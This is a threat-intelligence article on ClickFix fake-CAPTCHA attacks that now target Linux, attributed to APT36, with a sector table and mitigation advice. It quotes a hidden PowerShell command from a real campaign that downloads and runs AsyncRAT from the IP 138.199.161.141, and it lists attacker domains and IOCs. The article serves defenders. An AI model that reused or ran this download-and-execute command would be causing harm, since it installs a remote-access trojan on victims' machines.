ClickFix Attacks Expand to Linux: Tactics, Payloads, and Mitigation Strategies

A new wave of ClickFix attacks has emerged, now targeting Linux systems alongside Windows, marking a significant shift in attacker tactics. Security researchers have observed Pakistan-linked APT36 impersonating India’s Ministry of Defence to distribute malicious shell scripts through fake CAPTCHA pages¹. While current payloads appear non-malicious, this development signals threat actors are actively testing Linux infection vectors for future campaigns.

ClickFix Attack Methodology

The ClickFix technique relies on social engineering to trick users into executing malicious commands copied to their clipboard. Attackers typically lure victims to compromised websites hosting fake error messages or CAPTCHA verification pages. When users attempt to resolve these fake issues, they’re instructed to paste and run commands in their terminal or PowerShell².

Recent campaigns have employed several variations of this attack. One method involves the mapeal.sh shell script being copied to Linux users’ clipboards, while Windows targets receive PowerShell commands fetching AsyncRAT from 138.199.161.141:8080¹. Another variant uses fake Cloudflare CAPTCHA pages hosted on domains like overtimeforus.com/dow to distribute MSI installers containing malware².

Technical Analysis of Linux Payloads

The Linux-targeting ClickFix attacks currently focus on reconnaissance rather than immediate compromise. The mapeal.sh script appears designed to test Linux system compatibility and gather basic system information. However, security analysts warn this likely represents preliminary testing before more destructive payloads are deployed¹.

Windows payloads show greater sophistication, with examples including PowerShell scripts that:

'C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe' -w h -c '$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffffff0;irm 138.199.161.141:8080/$u|iex'

This command generates a timestamp-based URL to fetch AsyncRAT while attempting to evade detection through variable naming².

Sector-Specific Targeting

ClickFix attacks have impacted multiple industries with tailored approaches:

Sector	Tactics	Payloads
Healthcare	Fake browser updates with “Fix It” buttons	Stealc, Rhadamanthys
Education	Compromised iClicker student portals	PowerShell malware
Government	Impersonation of defense ministries	Interlock RAT

The healthcare sector has been particularly affected, with one campaign exfiltrating 1.5 TB of data from DaVita Inc. using Interlock ransomware³.

Mitigation and Detection

Organizations can implement several defenses against ClickFix attacks:

Disable clipboard access for web browsers via Group Policy
Restrict PowerShell execution to Restricted mode
Monitor for connections to known IOCs like 185.250.151.155
Educate users to never execute commands from untrusted sources

For Linux systems, additional precautions include implementing strict clipboard permissions and monitoring for suspicious shell script executions originating from browser activities⁴.

Conclusion

The expansion of ClickFix attacks to Linux systems represents an escalation in cross-platform threat activity. While current Linux payloads remain limited, their existence demonstrates threat actors’ growing interest in compromising diverse operating environments. Organizations should prepare for more sophisticated Linux-targeting variants by implementing the recommended mitigations and maintaining vigilance against social engineering tactics.